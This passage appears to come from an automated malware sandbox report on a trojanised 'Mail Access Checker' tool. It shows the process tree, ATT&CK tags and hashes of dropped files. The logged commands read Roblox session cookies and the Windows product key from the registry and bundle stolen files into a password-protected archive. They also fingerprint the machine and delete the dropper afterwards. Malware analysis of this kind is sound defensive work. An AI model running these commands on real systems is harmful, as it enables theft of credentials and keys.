                                                                    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                                    4⤵
                                                                      PID:1328
                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                        5⤵
                                                                        • Command and Scripting Interpreter: PowerShell
                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                        PID:4368
                                                                    • C:\Windows\system32\cmd.exe
                                                                      C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                                      4⤵
                                                                        PID:1408
                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                          5⤵
                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                          PID:3400
                                                                      • C:\Windows\system32\cmd.exe
                                                                        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI22762\rar.exe a -r -hp"blank123" "C:\Users\Admin\AppData\Local\Temp\Zw061.zip" *"
                                                                        4⤵
                                                                          PID:3452
                                                                          • C:\Users\Admin\AppData\Local\Temp\_MEI22762\rar.exe
                                                                            C:\Users\Admin\AppData\Local\Temp\_MEI22762\rar.exe a -r -hp"blank123" "C:\Users\Admin\AppData\Local\Temp\Zw061.zip" *
                                                                            5⤵
                                                                            • Executes dropped EXE
                                                                            PID:2752
                                                                        • C:\Windows\system32\cmd.exe
                                                                          C:\Windows\system32\cmd.exe /c "wmic os get Caption"
                                                                          4⤵
                                                                            PID:1524
                                                                            • C:\Windows\System32\Wbem\WMIC.exe
                                                                              wmic os get Caption
                                                                              5⤵
                                                                                PID:1736
                                                                            • C:\Windows\system32\cmd.exe
                                                                              C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
                                                                              4⤵
                                                                                PID:1184
                                                                                • C:\Windows\System32\Wbem\WMIC.exe
                                                                                  wmic computersystem get totalphysicalmemory
                                                                                  5⤵
                                                                                    PID:3596
                                                                                • C:\Windows\system32\cmd.exe
                                                                                  C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                                                                  4⤵
                                                                                    PID:844
                                                                                    • C:\Windows\System32\Wbem\WMIC.exe
                                                                                      wmic csproduct get uuid
                                                                                      5⤵
                                                                                        PID:4888
                                                                                    • C:\Windows\system32\cmd.exe
                                                                                      C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
                                                                                      4⤵
                                                                                        PID:1300
                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                                                                                          5⤵
                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                          PID:2564
                                                                                      • C:\Windows\system32\cmd.exe
                                                                                        C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                                                                                        4⤵
                                                                                          PID:4588
                                                                                          • C:\Windows\System32\Wbem\WMIC.exe
                                                                                            wmic path win32_VideoController get name
                                                                                            5⤵
                                                                                            • Detects videocard installed
                                                                                            PID:4048
                                                                                        • C:\Windows\system32\cmd.exe
                                                                                          C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
                                                                                          4⤵
                                                                                            PID:1652
                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
                                                                                              5⤵
                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                              PID:2744
                                                                                          • C:\Windows\system32\cmd.exe
                                                                                            C:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "C:\Users\Admin\Desktop\Mail Access Checker by xRisky v2 [Free version]\Data\Modules\Checker.exe""
                                                                                            4⤵
                                                                                            • System Network Configuration Discovery: Internet Connection Discovery
                                                                                            PID:2780
                                                                                            • C:\Windows\system32\PING.EXE
                                                                                              ping localhost -n 3
                                                                                              5⤵
                                                                                              • System Network Configuration Discovery: Internet Connection Discovery
                                                                                              • Runs ping.exe
                                                                                              PID:644
                                                                                      • C:\Users\Admin\Desktop\Mail Access Checker by xRisky v2 [Free version]\Data\Modules\Checker1.exe
                                                                                        "C:\Users\Admin\Desktop\Mail Access Checker by xRisky v2 [Free version]\Data\Modules\Checker1.exe"
                                                                                        2⤵
                                                                                        • Executes dropped EXE
                                                                                        • Modifies registry class
                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                        • Suspicious behavior: GetForegroundWindowSpam
                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                        PID:1404
                                                                                    • C:\Users\Admin\Desktop\Mail Access Checker by xRisky v2 [Free version]\Mailaccess Checker by xRisky v2.exe
                                                                                      "C:\Users\Admin\Desktop\Mail Access Checker by xRisky v2 [Free version]\Mailaccess Checker by xRisky v2.exe"
                                                                                      1⤵
                                                                                      • Executes dropped EXE
                                                                                      • System Location Discovery: System Language Discovery
                                                                                      PID:4476
                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 4476 -s 1112
                                                                                        2⤵
                                                                                        • Program crash
                                                                                        PID:5036
                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 4476 -ip 4476
                                                                                      1⤵
                                                                                        PID:2864

                                                                                      Network

                                                                                      MITRE ATT&CK Enterprise v15

                                                                                      Replay Monitor

                                                                                      Loading Replay Monitor...

                                                                                      Downloads

                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                                                                        Filesize

                                                                                        2KB

                                                                                        MD5

                                                                                        627073ee3ca9676911bee35548eff2b8

                                                                                        SHA1

                                                                                        4c4b68c65e2cab9864b51167d710aa29ebdcff2e

                                                                                        SHA256

                                                                                        85b280a39fc31ba1e15fb06102a05b8405ff3b82feb181d4170f04e466dd647c

                                                                                        SHA512

                                                                                        3c5f6c03e253b83c57e8d6f0334187dbdcdf4fa549eecd36cbc1322dca6d3ca891dc6a019c49ec2eafb88f82d0434299c31e4dfaab123acb42e0546218f311fb

                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                        Filesize

                                                                                        944B

                                                                                        MD5

                                                                                        aa4f31835d07347297d35862c9045f4a

                                                                                        SHA1

                                                                                        83e728008935d30f98e5480fba4fbccf10cefb05

                                                                                        SHA256

                                                                                        99c83bc5c531e49d4240700142f3425aba74e18ebcc23556be32238ffde9cce0

                                                                                        SHA512

                                                                                        ec3a4bee8335007b8753ae8ac42287f2b3bcbb258f7fc3fb15c9f8d3e611cb9bf6ae2d3034953286a34f753e9ec33f7495e064bab0e8c7fcedd75d6e5eb66629

                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                        Filesize

                                                                                        1KB

                                                                                        MD5

                                                                                        571c8ce66a155f274caadab88a21199d

                                                                                        SHA1

                                                                                        bacaa6a65551327267e4e7601237b6516e920f65

                                                                                        SHA256

                                                                                        d73e6132c3b3b9a29c6503d1043c8a0c37cab83d92fd1371add502c6bbd0f775

                                                                                        SHA512

                                                                                        085941cc9ffcd7c2effdd4733494e1fa07db339bbc4c245050ef1ba8508763b0f05a3142472987b2e4cf23247dca63db8b4b61ab08d359b706c9a1ee07b3a38f

                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                        Filesize

                                                                                        944B

                                                                                        MD5

                                                                                        4d8f8d18e387c8a77585de55a9d7dfe1

                                                                                        SHA1

                                                                                        180e6e7d2166fa3c912bcad5457e27c1d3b2f597

                                                                                        SHA256

                                                                                        15acafa9bda8d4453f303494462fa5aff04e52699a22f5beed535e7acd2278af

                                                                                        SHA512

                                                                                        4950ef40ee4f9c8c5e92b33b607949fc216a54d44ebe4c76ff07763ed675748e15ae04f32a45d11cd36a2b86dd6ea7d9c987757948e4fe13f9489c726ac2164f

                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                        Filesize

                                                                                        1KB

                                                                                        MD5

                                                                                        e596edfca155e5d8296683399e2de725

                                                                                        SHA1

                                                                                        ecd45a972d66eb9c99b9f069dd286742e64253f7

                                                                                        SHA256

                                                                                        af5662b634d49f1a18775ce96abc7084c12917f6e9d1d29117e213b96ea6b0f0

                                                                                        SHA512

                                                                                        d26d4a318f4bc9fa1ac9ba8bcae7ef906bf66de468c3a9aa27f8c4cf8acbdb49d2698b95d1d021d8245c865f9c22880624a729515dfa6fbd3aae5030da31743d

                                                                                      • C:\Users\Admin\AppData\Local\Temp\RESFDA9.tmp

                                                                                        Filesize

                                                                                        1KB

                                                                                        MD5

                                                                                        350b8edea7725a2bdc84558c41e46965

                                                                                        SHA1

                                                                                        ff12a0070f41b786f4ce06dd787069e32f53299f

                                                                                        SHA256

                                                                                        4410e6bf2ef63c4bb9b0b5d3af8c435e48cb264cd3df4647e058df4d718c4ddd

                                                                                        SHA512

                                                                                        7910f8acecd82c9a2d5b935a98abb209991aefc61dd6826a8fca6fd73f2ac7d97aaa6e8fa56c8c23b68500728b6237cfe998cef3e436774e9d25d7bfaff185f4

                                                                                      • C:\Users\Admin\AppData\Local\Temp\_MEI22762\VCRUNTIME140.dll

                                                                                        Filesize

                                                                                        95KB

                                                                                        MD5

                                                                                        f34eb034aa4a9735218686590cba2e8b

                                                                                        SHA1

                                                                                        2bc20acdcb201676b77a66fa7ec6b53fa2644713

                                                                                        SHA256

                                                                                        9d2b40f0395cc5d1b4d5ea17b84970c29971d448c37104676db577586d4ad1b1

                                                                                        SHA512

                                                                                        d27d5e65e8206bd7923cf2a3c4384fec0fc59e8bc29e25f8c03d039f3741c01d1a8c82979d7b88c10b209db31fbbec23909e976b3ee593dc33481f0050a445af

                                                                                      • C:\Users\Admin\AppData\Local\Temp\_MEI22762\_bz2.pyd

                                                                                        Filesize

                                                                                        47KB

                                                                                        MD5

                                                                                        fba120a94a072459011133da3a989db2

                                                                                        SHA1

                                                                                        6568b3e9e993c7e993a699505339bbebb5db6fb0

                                                                                        SHA256

                                                                                        055a93c8b127dc840ac40ca70d4b0246ac88c9cde1ef99267bbe904086e0b7d3

                                                                                        SHA512

                                                                                        221b5a2a9de1133e2866b39f493a822060d3fb85f8c844c116f64878b9b112e8085e61d450053d859a63450d1292c13bd7ec38b89fe2dfa6684ac94e090ec3aa

                                                                                      • C:\Users\Admin\AppData\Local\Temp\_MEI22762\_ctypes.pyd

                                                                                        Filesize

                                                                                        58KB

                                                                                        MD5

                                                                                        31859b9a99a29127c4236968b87dbcbb

                                                                                        SHA1

                                                                                        29b4ee82aa026c10fe8a4f43b40cbd8ec7ea71e5

                                                                                        SHA256

                                                                                        644712c3475be7f02c2493d75e6a831372d01243aca61aa8a1418f57e6d0b713

                                                                                        SHA512

                                                                                        fec3ab9ce032e02c432d714de0d764aab83917129a5e6eeca21526b03176da68da08024d676bc0032200b2d2652e6d442ca2f1ef710a7408bd198995883a943a

                                                                                      • C:\Users\Admin\AppData\Local\Temp\_MEI22762\_decimal.pyd

                                                                                        Filesize

                                                                                        106KB

                                                                                        MD5

                                                                                        7cdc590ac9b4ffa52c8223823b648e5c

                                                                                        SHA1

                                                                                        c8d9233acbff981d96c27f188fcde0e98cdcb27c

                                                                                        SHA256

                                                                                        f281bd8219b4b0655e9c3a5516fe0b36e44c28b0ac9170028dd052ca234c357c

                                                                                        SHA512

                                                                                        919c36be05f5f94ec84e68ecca43c7d43acb8137a043cf429a9e995643ca69c4c101775955e36c15f844f64fc303999da0cbfe5e121eb5b3ffb7d70e3cd08e0b

                                                                                      • C:\Users\Admin\AppData\Local\Temp\_MEI22762\_hashlib.pyd

                                                                                        Filesize

                                                                                        35KB

                                                                                        MD5

                                                                                        659a5efa39a45c204ada71e1660a7226

                                                                                        SHA1

                                                                                        1a347593fca4f914cfc4231dc5f163ae6f6e9ce0

                                                                                        SHA256

                                                                                        b16c0cc3baa67246d8f44138c6105d66538e54d0afb999f446cae58ac83ef078

                                                                                        SHA512

                                                                                        386626b3bad58b450b8b97c6ba51ce87378cddf7f574326625a03c239aa83c33f4d824d3b8856715f413cfb9238d23f802f598084dbd8c73c8f6c61275fdecb5

                                                                                      • C:\Users\Admin\AppData\Local\Temp\_MEI22762\_lzma.pyd

                                                                                        Filesize

                                                                                        85KB

                                                                                        MD5

                                                                                        864b22495372fa4d8b18e1c535962ae2

                                                                                        SHA1

                                                                                        8cfaee73b7690b9731303199e3ed187b1c046a85

                                                                                        SHA256

                                                                                        fc57bd20b6b128afa5faaac1fd0ce783031faaf39f71b58c9cacf87a16f3325f

                                                                                        SHA512

                                                                                        9f26fe88aca42c80eb39153708b2315a4154204fc423ca474860072dd68ccc00b7081e8adb87ef9a26b9f64cd2f4334f64bc2f732cd47e3f44f6cf9cc16fa187

                                                                                      • C:\Users\Admin\AppData\Local\Temp\_MEI22762\_queue.pyd

                                                                                        Filesize

                                                                                        25KB

                                                                                        MD5

                                                                                        bebc7743e8af7a812908fcb4cdd39168

                                                                                        SHA1

                                                                                        00e9056e76c3f9b2a9baba683eaa52ecfa367edb

                                                                                        SHA256

                                                                                        cc275b2b053410c6391339149baf5b58df121a915d18b889f184be02bedaf9bc

                                                                                        SHA512

                                                                                        c56496c6396b8c3ec5ec52542061b2146ea80d986dfe13b0d4feb7b5953c80663e34ccd7b7ee99c4344352492be93f7d31f7830ec9ec2ca8a0c2055cb18fa8db

                                                                                      • C:\Users\Admin\AppData\Local\Temp\_MEI22762\_socket.pyd

                                                                                        Filesize

                                                                                        42KB

                                                                                        MD5

                                                                                        49f87aec74fea76792972022f6715c4d

                                                                                        SHA1

                                                                                        ed1402bb0c80b36956ec9baf750b96c7593911bd

                                                                                        SHA256

                                                                                        5d8c8186df42633679d6236c1febf93db26405c1706f9b5d767feab440ea38b0

                                                                                        SHA512

                                                                                        de58d69228395827547e07695f70ef98cdaf041ebaae0c3686246209254f0336a589b58d44b7776ccae24a5bc03b9dc8354c768170b1771855f342eecc5fead4

                                                                                      • C:\Users\Admin\AppData\Local\Temp\_MEI22762\_sqlite3.pyd

                                                                                        Filesize

                                                                                        50KB

                                                                                        MD5

                                                                                        70a7050387359a0fab75b042256b371f

                                                                                        SHA1

                                                                                        5ffc6dfbaddb6829b1bfd478effb4917d42dff85

                                                                                        SHA256

                                                                                        e168a1e229f57248253ead19f60802b25dc0dbc717c9776e157b8878d2ca4f3d

                                                                                        SHA512

                                                                                        154fd26d4ca1e6a85e3b84ce9794a9d1ef6957c3bba280d666686a0f14aa571aaec20baa0e869a78d4669f1f28ea333c0e9e4d3ecd51b25d34e46a0ef74ee735

                                                                                      • C:\Users\Admin\AppData\Local\Temp\_MEI22762\_ssl.pyd

                                                                                        Filesize

                                                                                        62KB

                                                                                        MD5

                                                                                        9a7ab96204e505c760921b98e259a572

                                                                                        SHA1

                                                                                        39226c222d3c439a03eac8f72b527a7704124a87

                                                                                        SHA256

                                                                                        cae09bbbb12aa339fd9226698e7c7f003a26a95390c7dc3a2d71a1e540508644

                                                                                        SHA512

                                                                                        0f5f58fb47379b829ee70c631b3e107cde6a69dc64e4c993fb281f2d5ada926405ce29ea8b1f4f87ed14610e18133932c7273a1aa209a0394cc6332f2aba7e58

                                                                                      • C:\Users\Admin\AppData\Local\Temp\_MEI22762\base_library.zip

                                                                                        Filesize

                                                                                        859KB

                                                                                        MD5

                                                                                        4c60bcc38288ed81c09957fc6b4cd7cd

                                                                                        SHA1

                                                                                        e7f08d71e567ea73bb30656953837314c8d715a7

                                                                                        SHA256

                                                                                        9d6f7b75918990ec9cd5820624130af309a2045119209bd90b4f70bc3abd3733

                                                                                        SHA512

                                                                                        856d97b81a2cb53dcba0136afa0782e0f3f81bea46f98e0247582b2e28870b837be3c03e87562b918ec6bc76469eecc2c22599238d191d3fba467f7031a2acaa

                                                                                      • C:\Users\Admin\AppData\Local\Temp\_MEI22762\blank.aes

                                                                                        Filesize

                                                                                        72KB

                                                                                        MD5

                                                                                        fc2931487cc438ca082287b1ca89a0f4

                                                                                        SHA1

                                                                                        7c86c916b92a16b3105d7119f11bf4264a5ff93e

                                                                                        SHA256

                                                                                        7938869c5d1b48de99559332c0edbd8a0b3772a9253b0f7a5b506c581db30d7d

                                                                                        SHA512

                                                                                        a88720c48dda86370c51271f6c14f6afa1c1aab123e4510c688b883b30727c4e99e39d89efd517877038ae23e71019c85e8905e6c495b0b7516dbdfabbaf6851

                                                                                      • C:\Users\Admin\AppData\Local\Temp\_MEI22762\libcrypto-1_1.dll

                                                                                        Filesize

                                                                                        1.1MB

                                                                                        MD5

                                                                                        bbc1fcb5792f226c82e3e958948cb3c3

                                                                                        SHA1

                                                                                        4d25857bcf0651d90725d4fb8db03ccada6540c3

                                                                                        SHA256

                                                                                        9a36e09f111687e6b450937bb9c8aede7c37d598b1cccc1293eed2342d11cf47

                                                                                        SHA512

                                                                                        3137be91f3393df2d56a3255281db7d4a4dccd6850eeb4f0df69d4c8dda625b85d5634fce49b195f3cc431e2245b8e9ba401baaa08778a467639ee4c1cc23d8d

                                                                                      • C:\Users\Admin\AppData\Local\Temp\_MEI22762\libffi-7.dll

                                                                                        Filesize

                                                                                        23KB

                                                                                        MD5

                                                                                        6f818913fafe8e4df7fedc46131f201f

                                                                                        SHA1

                                                                                        bbb7ba3edbd4783f7f973d97b0b568cc69cadac5

                                                                                        SHA256

                                                                                        3f94ee4f23f6c7702ab0cc12995a6457bf22183fa828c30cc12288adf153ae56

                                                                                        SHA512

                                                                                        5473fe57dc40af44edb4f8a7efd68c512784649d51b2045d570c7e49399990285b59cfa6bcd25ef1316e0a073ea2a89fe46be3bfc33f05e3333037a1fd3a6639

                                                                                      • C:\Users\Admin\AppData\Local\Temp\_MEI22762\libssl-1_1.dll

                                                                                        Filesize

                                                                                        204KB

                                                                                        MD5

                                                                                        ad0a2b4286a43a0ef05f452667e656db

                                                                                        SHA1

                                                                                        a8835ca75768b5756aa2445ca33b16e18ceacb77

                                                                                        SHA256

                                                                                        2af3d965863018c66c2a9a2d66072fe3657bbd0b900473b9bbdcac8091686ae1

                                                                                        SHA512

                                                                                        cceb5ec1dd6d2801abbacd6112393fecbf5d88fe52db86cfc98f13326c3d3e31c042b0cc180b640d0f33681bdd9e6a355dc0fbfde597a323c8d9e88de40b37c4

                                                                                      • C:\Users\Admin\AppData\Local\Temp\_MEI22762\python310.dll

                                                                                        Filesize

                                                                                        1.4MB

                                                                                        MD5

                                                                                        4a6afa2200b1918c413d511c5a3c041c

                                                                                        SHA1

                                                                                        39ca3c2b669adac07d4a5eb1b3b79256cfe0c3b3

                                                                                        SHA256

                                                                                        bec187f608507b57cf0475971ba646b8ab42288af8fdcf78bce25f1d8c84b1da

                                                                                        SHA512

                                                                                        dbffb06ffff0542200344ea9863a44a6f1e1b783379e53df18580e697e8204d3911e091deb32a9c94b5599cdd54301b705b74e1f51104151cf13b89d57280a20

                                                                                      • C:\Users\Admin\AppData\Local\Temp\_MEI22762\rar.exe

                                                                                        Filesize

                                                                                        615KB

                                                                                        MD5

                                                                                        9c223575ae5b9544bc3d69ac6364f75e

                                                                                        SHA1

                                                                                        8a1cb5ee02c742e937febc57609ac312247ba386

                                                                                        SHA256

                                                                                        90341ac8dcc9ec5f9efe89945a381eb701fe15c3196f594d9d9f0f67b4fc2213

                                                                                        SHA512

                                                                                        57663e2c07b56024aaae07515ee3a56b2f5068ebb2f2dc42be95d1224376c2458da21c965aab6ae54de780cb874c2fc9de83d9089abf4536de0f50faca582d09

                                                                                      • C:\Users\Admin\AppData\Local\Temp\_MEI22762\rarreg.key

                                                                                        Filesize

                                                                                        456B

                                                                                        MD5

                                                                                        4531984cad7dacf24c086830068c4abe

                                                                                        SHA1

                                                                                        fa7c8c46677af01a83cf652ef30ba39b2aae14c3

                                                                                        SHA256

                                                                                        58209c8ab4191e834ffe2ecd003fd7a830d3650f0fd1355a74eb8a47c61d4211

                                                                                        SHA512

                                                                                        00056f471945d838ef2ce56d51c32967879fe54fcbf93a237ed85a98e27c5c8d2a39bc815b41c15caace2071edd0239d775a31d1794dc4dba49e7ecff1555122

                                                                                      • C:\Users\Admin\AppData\Local\Temp\_MEI22762\select.pyd

                                                                                        Filesize

                                                                                        25KB

                                                                                        MD5

                                                                                        b6de7c98e66bde6ecffbf0a1397a6b90

                                                                                        SHA1

                                                                                        63823ef106e8fd9ea69af01d8fe474230596c882

                                                                                        SHA256

                                                                                        84b2119ed6c33dfbdf29785292a529aabbf75139d163cfbcc99805623bb3863c

                                                                                        SHA512

                                                                                        1fc26e8edc447d87a4213cb5df5d18f990bba80e5635e83193f2ae5368dd88a81fddfb4575ef4475e9bf2a6d75c5c66c8ed772496ffa761c0d8644fcf40517ca

                                                                                      • C:\Users\Admin\AppData\Local\Temp\_MEI22762\sqlite3.dll

                                                                                        Filesize

                                                                                        622KB

                                                                                        MD5

                                                                                        0c4996047b6efda770b03f8f231e39b8

                                                                                        SHA1

                                                                                        dffcabcd4e950cc8ee94c313f1a59e3021a0ad48

                                                                                        SHA256

                                                                                        983f31bc687e0537d6028a9a65f4825cc560bbf3cb3eb0d3c0fcc2238219b5ed

                                                                                        SHA512

                                                                                        112773b83b5b4b71007f2668b0344bf45db03bbe1f97ae738615f3c4e2f8afb54b3ae095ea1131bf858ddfb1e585389658af5db56561609a154ae6bb80dc79ba

                                                                                      • C:\Users\Admin\AppData\Local\Temp\_MEI22762\unicodedata.pyd

                                                                                        Filesize

                                                                                        289KB

                                                                                        MD5

                                                                                        c697dc94bdf07a57d84c7c3aa96a2991

                                                                                        SHA1

                                                                                        641106acd3f51e6db1d51aa2e4d4e79cf71dc1ab

                                                                                        SHA256

                                                                                        58605600fdaafbc0052a4c1eb92f68005307554cf5ad04c226c320a1c14f789e

                                                                                        SHA512

                                                                                        4f735678b7e38c8e8b693593696f9483cf21f00aea2a6027e908515aa047ec873578c5068354973786e9cfd0d25b7ab1dd6cbb1b97654f202cbb17e233247a61

                                                                                      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_jve1kql5.isk.ps1

                                                                                        Filesize

                                                                                        60B

                                                                                        MD5

                                                                                        d17fe0a3f47be24a6453e9ef58c94641

                                                                                        SHA1

                                                                                        6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                                        SHA256

                                                                                        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                                        SHA512

                                                                                        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                                      • C:\Users\Admin\AppData\Local\Temp\jcptgfcr\jcptgfcr.dll

                                                                                        Filesize

                                                                                        4KB

                                                                                        MD5

                                                                                        9ad9a64aa6e23f8fbbac3705b5abbaf2

                                                                                        SHA1

                                                                                        3c68f0d0d71b8e9141aa367209ce952079b3f8f7

                                                                                        SHA256

                                                                                        37418d59c9612b5df5da73293348a981b6a41bca59f613147530e7d26b073039

                                                                                        SHA512

                                                                                        7d7ac794c170617645722e9e67971c03ebc4bb508f9ad8233d9e1d938c1247ff9c76643c1193de5dd91d4a3bfd169937eab56335239bb7e1cd3161c0299f2ef1

                                                                                      • C:\Users\Admin\AppData\Local\Temp\   ‍  ‌  ​\Common Files\Desktop\CheckpointStart.docx

                                                                                        Filesize

                                                                                        18KB

                                                                                        MD5

                                                                                        643492484fe8c9af155fe20cbecba698

                                                                                        SHA1

                                                                                        d980925b3948f835a68de47c74743939fc15c614

                                                                                        SHA256

                                                                                        beed4f32180b26e5ae3980b054d112faa1e1c57d9f1ec1ca437c5236d3ec8db0

                                                                                        SHA512

                                                                                        642200b2eacd1c5df7c85f8b53aef39c4c4631afbf1d36018b4ea0f423893602c0b6a7462079a8f84d1406adeac1979fbfd80b6dcd46e89fae244f10148ceebb

                                                                                      • C:\Users\Admin\AppData\Local\Temp\   ‍  ‌  ​\Common Files\Desktop\CompleteLock.jpeg

                                                                                        Filesize

                                                                                        406KB

                                                                                        MD5

                                                                                        9b349712c217fa396fd323554aceabd3

                                                                                        SHA1

                                                                                        246681afbbb27532d3219d9cb56583ce4e22230e

                                                                                        SHA256

                                                                                        c72b31d2218b349cc16ad6b0325f81e02dae41dfc817772009c80246d155c6a7

                                                                                        SHA512

                                                                                        7bf185f816467b9f7d508fa7e123e7e08ab31ecfe6e8ff7e6c6e7a372b5ca59fc5762869fca3e69afa4f0d15f045f06c5db250c58b57e7c5093498bc32099b9d

                                                                                      • C:\Users\Admin\AppData\Local\Temp\   ‍  ‌  ​\Common Files\Desktop\EnableFormat.xlsx

                                                                                        Filesize

                                                                                        12KB

                                                                                        MD5

                                                                                        28dbdc02558c518978971b448618ed7e

                                                                                        SHA1

                                                                                        bea4438caa8ecc5b68240da57c09f8c0203bd6e2

                                                                                        SHA256

                                                                                        bb9c5e3110e01a965e130334f1d6015ec71dc314eaa373ce0bd61d3479b5df7c

                                                                                        SHA512

                                                                                        fca4d42fe0a5824cfceff5a0ac4de679ce81a65b7f906c296dca3ccfa56a69338099c7b7c67b87e9303d136f16c7cb00488ddb95762c60f654e78aedd502a3c5

                                                                                      • C:\Users\Admin\Desktop\98k+.txt

                                                                                        Filesize

                                                                                        3.4MB

                                                                                        MD5

                                                                                        ac30df909172b98707863fa97e7c7e31

                                                                                        SHA1

                                                                                        bf624cd0858c180a95ac81d240b270ed25d14e37

                                                                                        SHA256

                                                                                        a93a257b73ca96699099bb2e7b928498b802e4220440758b7426799c06ca89dd

                                                                                        SHA512

                                                                                        215407ce5c6b7ba3b0e1b10d0bcff6a461110298ec21539713671127b13db9394e50bab6d0ed52fe3e6b9e13987a68707edbda853dd0824df54ecfffd875306e

                                                                                      • C:\Users\Admin\Desktop\Mail Access Checker by xRisky v2 [Free version]\Data\Modules\Checker.exe

                                                                                        Filesize

                                                                                        6.0MB

                                                                                        MD5

                                                                                        7b23b16fb9cb368b3b282f96d5067229

                                                                                        SHA1

                                                                                        0393a31b074ce29a904e97929da620d3a2bc9f89

                                                                                        SHA256

                                                                                        7e55049a20a923847008b11dd7c0886ab0b88bc9cf612fd4548191453c4fc5c9

                                                                                        SHA512

                                                                                        57bc40d31995d451c1600de88e5f3c20253e63f248251033d2f92ab9d415c6d648ef4f1025e810ef7f561e7a45be6746de7a78da9a91467329145b6a40f0d8cf

                                                                                      • C:\Users\Admin\Desktop\Mail Access Checker by xRisky v2 [Free version]\Mailaccess Checker by xRisky v2.exe

                                                                                        Filesize

                                                                                        582KB

                                                                                        MD5

                                                                                        82c493c58ad0ed2255d1500840d1d75c

                                                                                        SHA1

                                                                                        24b2997983add8d90e896af2dbdc32cf19895389

                                                                                        SHA256

                                                                                        325a912d9f9f4878cfc13a45a2da2494b4c4080c39d8a40166eb39c6ef3d24a0

                                                                                        SHA512

                                                                                        68f91fe3693dffdaadf28ad5dd3719cdfddff6e4729f48774ae336aef97908d8bc2c419aff65a7d4cbe24e2b85ea2f311dfec2de1136ed7fd7374d2d3ead8c88

                                                                                      • C:\Users\Admin\Desktop\Mail Access Checker by xRisky v2 [Free version]\Results\17 December (21;18;06)\Errors\Error Database.txt

                                                                                        Filesize

                                                                                        4KB

                                                                                        MD5

                                                                                        68aabd4760fb97e3c4e1e005588196c4

                                                                                        SHA1

                                                                                        a213cd502738f0bc6c7f869f8785d4d35807b4e8

                                                                                        SHA256

                                                                                        4d4a2a7da59768803bd782719dca5d50a1574422d6b4e8dfb14c0ad290b14ec6

                                                                                        SHA512

                                                                                        927e4d2d750fa73b74fb2cc4cf78f2b5aae2e193b324c35b1b261bc47ba91cb3449939f0353fc1d25b370dc531b6c015dafbf17b5039b19bcf6a866e7871fd87

                                                                                      • C:\Windows\System32\drivers\etc\hosts

                                                                                        Filesize

                                                                                        2KB

                                                                                        MD5

                                                                                        f99e42cdd8b2f9f1a3c062fe9cf6e131

                                                                                        SHA1

                                                                                        e32bdcab8da0e3cdafb6e3876763cee002ab7307

                                                                                        SHA256

                                                                                        a040d43136f2f4c41a4875f895060fb910267f2ffad2e3b1991b15c92f53e0f0

                                                                                        SHA512

                                                                                        c55a5e440326c59099615b21d0948cdc2a42bd9cf5990ec88f69187fa540d8c2e91aebe6a25ed8359a47be29d42357fec4bd987ca7fae0f1a6b6db18e1c320a6

                                                                                      • \??\c:\Users\Admin\AppData\Local\Temp\jcptgfcr\CSC37D93B0F295446D0899BC5D28A3464F.TMP

                                                                                        Filesize

                                                                                        652B

                                                                                        MD5

                                                                                        5822d98d83e598acde97f95f8edf7885

                                                                                        SHA1

                                                                                        6a9cde8d5cdf7481dd088c0d807c5f3e66134c7e

                                                                                        SHA256

